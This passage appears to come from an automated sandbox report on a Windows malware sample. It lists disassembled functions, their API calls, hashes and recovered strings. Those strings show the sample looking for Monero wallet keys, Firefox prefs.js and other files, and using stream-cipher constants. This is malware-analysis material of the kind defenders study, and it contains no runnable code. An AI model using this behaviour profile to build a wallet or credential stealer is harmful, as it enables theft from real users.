                                    • Opcode ID: 615205e537de3a1e61b62d4d2f4a04dc9e395c36e17d1f750be6173fd217579c
                                    • Instruction ID: 7b58c298a7f15cd89ad90717b58bcb5f4020a3fde8d0097cb43b2723cadbf227
                                    • Opcode Fuzzy Hash: 615205e537de3a1e61b62d4d2f4a04dc9e395c36e17d1f750be6173fd217579c
                                    • Instruction Fuzzy Hash: 21A122B2A002189BDB75DF64DC85FEE737DAB45700F048589F60D96141DB749B88CF91
                                    Function 00374B60 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • wsprintfA.USER32 ref: 00374B7C
                                    • FindFirstFileA.KERNEL32(?,?), ref: 00374B93
                                    • StrCmpCA.SHLWAPI(?,00380FC4), ref: 00374BC1
                                    • StrCmpCA.SHLWAPI(?,00380FC8), ref: 00374BD7
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00374DCD
                                    • FindClose.KERNEL32(000000FF), ref: 00374DE2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextwsprintf
                                    • String ID: %s\%s$%s\%s$%s\*
                                    • API String ID: 180737720-445461498
                                    • Opcode ID: d0b60b957900afff6d5ae094f4caf29ddb16334ab367428e67bccc4c4f2e3050
                                    • Instruction ID: 4fe8fe3f0cb4d0c8cc7b27600b4247049dbaaab5e7f54b8ab75ea3717f93bb2c
                                    • Opcode Fuzzy Hash: d0b60b957900afff6d5ae094f4caf29ddb16334ab367428e67bccc4c4f2e3050
                                    • Instruction Fuzzy Hash: 116139B2500218ABCB75EBA0DC45FEA737DAB48700F0485D8F64D96155EB74AB88CF91
                                    Function 003747C0 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 003747D0
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 003747D7
                                    • wsprintfA.USER32 ref: 003747F6
                                    • FindFirstFileA.KERNEL32(?,?), ref: 0037480D
                                    • StrCmpCA.SHLWAPI(?,00380FAC), ref: 0037483B
                                    • StrCmpCA.SHLWAPI(?,00380FB0), ref: 00374851
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 003748DB
                                    • FindClose.KERNEL32(000000FF), ref: 003748F0
                                    • lstrcat.KERNEL32(?,00F3E530), ref: 00374915
                                    • lstrcat.KERNEL32(?,00F3D578), ref: 00374928
                                    • lstrlen.KERNEL32(?), ref: 00374935
                                    • lstrlen.KERNEL32(?), ref: 00374946
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                    • String ID: %s\%s$%s\*
                                    • API String ID: 671575355-2848263008
                                    • Opcode ID: 83a92986a212c66640903b55131e797d7ab5f46f95e4e11a7c5b32c57246ba6d
                                    • Instruction ID: aae4d4693abc2a2720acf620dd59ccea1f0f981b4ec3fd4a39e328fe46619094
                                    • Opcode Fuzzy Hash: 83a92986a212c66640903b55131e797d7ab5f46f95e4e11a7c5b32c57246ba6d
                                    • Instruction Fuzzy Hash: A45145B2544218ABCB75EB70DC89FEE737DAB58700F409588B60D96150EB749B84CF91
                                    Function 003740F0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • wsprintfA.USER32 ref: 00374113
                                    • FindFirstFileA.KERNEL32(?,?), ref: 0037412A
                                    • StrCmpCA.SHLWAPI(?,00380F94), ref: 00374158
                                    • StrCmpCA.SHLWAPI(?,00380F98), ref: 0037416E
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 003742BC
                                    • FindClose.KERNEL32(000000FF), ref: 003742D1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextwsprintf
                                    • String ID: %s\%s
                                    • API String ID: 180737720-4073750446
                                    • Opcode ID: 01061f7f7918f5f79bf2eae0ca6e9520df251dc29b7f096e9b58e2ddeb482968
                                    • Instruction ID: 118c8be362ea6d8ce1095f808274da67fd5d0bd4c7e652ca3c6008bb1e6fbb8d
                                    • Opcode Fuzzy Hash: 01061f7f7918f5f79bf2eae0ca6e9520df251dc29b7f096e9b58e2ddeb482968
                                    • Instruction Fuzzy Hash: 1D5157B2504218ABCB35EBB0DD85EEE737DBB58300F4085C8B64D96051EB75AB89CF90
                                    Function 0036EE20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • wsprintfA.USER32 ref: 0036EE3E
                                    • FindFirstFileA.KERNEL32(?,?), ref: 0036EE55
                                    • StrCmpCA.SHLWAPI(?,00381630), ref: 0036EEAB
                                    • StrCmpCA.SHLWAPI(?,00381634), ref: 0036EEC1
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0036F3AE
                                    • FindClose.KERNEL32(000000FF), ref: 0036F3C3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextwsprintf
                                    • String ID: %s\*.*
                                    • API String ID: 180737720-1013718255
                                    • Opcode ID: e046ddfbcc50412dd636179216a32e9bc5ed840841b96fe1f0112060550810d7
                                    • Instruction ID: 60e6b023649b67d951babee8dcf1c077f7989e07e15729df1956b7eb91e2f867
                                    • Opcode Fuzzy Hash: e046ddfbcc50412dd636179216a32e9bc5ed840841b96fe1f0112060550810d7
                                    • Instruction Fuzzy Hash: 0DE101729115189ADB66FB60CCA2EEE737DAF94300F4085D9B40F66092EE346F89CF51
                                    Function 003A0098 Relevance: 17.4, Strings: 13, Instructions: 1151COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 2-by$2-by$2-byexpa$expa$expa$expand 3$expand 32-by$nd 3$nd 32-by$te k$te k$te k$te knd 3expand 32-by
                                    • API String ID: 0-1562099544
                                    • Opcode ID: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                    • Instruction ID: 1c699076feadc95f850530779eb71003b5e410156e71aa0cf2a70b51792c1573
                                    • Opcode Fuzzy Hash: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                    • Instruction Fuzzy Hash: 3FE276B09083808FD7A4CF29C580B8BFBE1BFC8354F51892EE99997211D770A959CF56
                                    Function 0036F7B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0037AA50: lstrcpy.KERNEL32(00380E1A,00000000), ref: 0037AA98
                                      • Part of subcall function 0037AC30: lstrcpy.KERNEL32(00000000,?), ref: 0037AC82
                                      • Part of subcall function 0037AC30: lstrcat.KERNEL32(00000000), ref: 0037AC92
                                      • Part of subcall function 0037ACC0: lstrlen.KERNEL32(?,00F38980,?,\Monero\wallet.keys,00380E1A), ref: 0037ACD5
                                      • Part of subcall function 0037ACC0: lstrcpy.KERNEL32(00000000), ref: 0037AD14
                                      • Part of subcall function 0037ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0037AD22
                                      • Part of subcall function 0037ABB0: lstrcpy.KERNEL32(?,00380E1A), ref: 0037AC15
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,003816B0,00380D97), ref: 0036F81E
                                    • StrCmpCA.SHLWAPI(?,003816B4), ref: 0036F86F
                                    • StrCmpCA.SHLWAPI(?,003816B8), ref: 0036F885
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0036FBB1
                                    • FindClose.KERNEL32(000000FF), ref: 0036FBC3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                    • String ID: prefs.js
                                    • API String ID: 3334442632-3783873740
                                    • Opcode ID: bbb0d286268281a1a67a50e971ca3cd86d5bb5476b7110da1681b7e562057a01
                                    • Instruction ID: cabdf3e69b1e432ca4b3187395f612e11eff1f79ac8648016d74eb2580c56fa1
                                    • Opcode Fuzzy Hash: bbb0d286268281a1a67a50e971ca3cd86d5bb5476b7110da1681b7e562057a01
                                    • Instruction Fuzzy Hash: 37B12E71A105089BCB36FB64DD96EEE7379AF94300F10C5A8A40E5A195EF346B48CF92
                                    Function 00361710 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0037AA50: lstrcpy.KERNEL32(00380E1A,00000000), ref: 0037AA98
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0038523C,?,?,?,003852E4,?,?,00000000,?,00000000), ref: 00361963
                                    • StrCmpCA.SHLWAPI(?,0038538C), ref: 003619B3
                                    • StrCmpCA.SHLWAPI(?,00385434), ref: 003619C9
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00361D80
                                    • DeleteFileA.KERNEL32(00000000), ref: 00361E0A
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00361E60
                                    • FindClose.KERNEL32(000000FF), ref: 00361E72
                                      • Part of subcall function 0037AC30: lstrcpy.KERNEL32(00000000,?), ref: 0037AC82
                                      • Part of subcall function 0037AC30: lstrcat.KERNEL32(00000000), ref: 0037AC92
                                      • Part of subcall function 0037ACC0: lstrlen.KERNEL32(?,00F38980,?,\Monero\wallet.keys,00380E1A), ref: 0037ACD5
                                      • Part of subcall function 0037ACC0: lstrcpy.KERNEL32(00000000), ref: 0037AD14
                                      • Part of subcall function 0037ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0037AD22
                                      • Part of subcall function 0037ABB0: lstrcpy.KERNEL32(?,00380E1A), ref: 0037AC15
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                    • String ID: \*.*
                                    • API String ID: 1415058207-1173974218
                                    • Opcode ID: f508bd089ebdd27366ac1133208ce1e9bf9a4b344518fa4edcb9b555734d8aa0
                                    • Instruction ID: b0848ea7d9d1cfea19abb33340410d56ac5a343e82ef0e9bdc0f0688079569c3
                                    • Opcode Fuzzy Hash: f508bd089ebdd27366ac1133208ce1e9bf9a4b344518fa4edcb9b555734d8aa0
                                    • Instruction Fuzzy Hash: 5E12CF71910519ABCB27FB60CCA6EEE7379AF94300F5085D9B10E6A091EF746B88CF51
                                    Function 0036DF10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0037AA50: lstrcpy.KERNEL32(00380E1A,00000000), ref: 0037AA98
                                      • Part of subcall function 0037ACC0: lstrlen.KERNEL32(?,00F38980,?,\Monero\wallet.keys,00380E1A), ref: 0037ACD5
                                      • Part of subcall function 0037ACC0: lstrcpy.KERNEL32(00000000), ref: 0037AD14
                                      • Part of subcall function 0037ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0037AD22
                                      • Part of subcall function 0037ABB0: lstrcpy.KERNEL32(?,00380E1A), ref: 0037AC15
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00380C32), ref: 0036DF5E
                                    • StrCmpCA.SHLWAPI(?,003815C0), ref: 0036DFAE
                                    • StrCmpCA.SHLWAPI(?,003815C4), ref: 0036DFC4
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0036E4E0
                                    • FindClose.KERNEL32(000000FF), ref: 0036E4F2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                    • String ID: \*.*
                                    • API String ID: 2325840235-1173974218
                                    • Opcode ID: 92693341babf4ecea62b4d53c802e2b02976864e94f603c0d5327768c7bc7167
                                    • Instruction ID: 66ed6ed3acddfb196916f8b1e25158cc3ee9c38487f90bf09f5530622ec6c08d
                                    • Opcode Fuzzy Hash: 92693341babf4ecea62b4d53c802e2b02976864e94f603c0d5327768c7bc7167
                                    • Instruction Fuzzy Hash: A8F19B719145189ACB37FB60CDA6EEE7379AF94300F5085D9A00F6A091EF346B89CF61
                                    Function 0036DB80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0037AA50: lstrcpy.KERNEL32(00380E1A,00000000), ref: 0037AA98
                                      • Part of subcall function 0037AC30: lstrcpy.KERNEL32(00000000,?), ref: 0037AC82
                                      • Part of subcall function 0037AC30: lstrcat.KERNEL32(00000000), ref: 0037AC92
                                      • Part of subcall function 0037ACC0: lstrlen.KERNEL32(?,00F38980,?,\Monero\wallet.keys,00380E1A), ref: 0037ACD5
                                      • Part of subcall function 0037ACC0: lstrcpy.KERNEL32(00000000), ref: 0037AD14
                                      • Part of subcall function 0037ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0037AD22
                                      • Part of subcall function 0037ABB0: lstrcpy.KERNEL32(?,00380E1A), ref: 0037AC15
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,003815A8,00380BAF), ref: 0036DBEB
                                    • StrCmpCA.SHLWAPI(?,003815AC), ref: 0036DC33
                                    • StrCmpCA.SHLWAPI(?,003815B0), ref: 0036DC49
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0036DECC
                                    • FindClose.KERNEL32(000000FF), ref: 0036DEDE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                    • String ID:
                                    • API String ID: 3334442632-0
                                    • Opcode ID: 562fdb64f31454ec0821a3eb9203794b0e07d2a2f5367ad5d5cd573797371cd9
                                    • Instruction ID: 3fb466d0b7fbc94c614064aa7f3e0a62d7f49619ecd3d3143363e5c7a9d16d0e
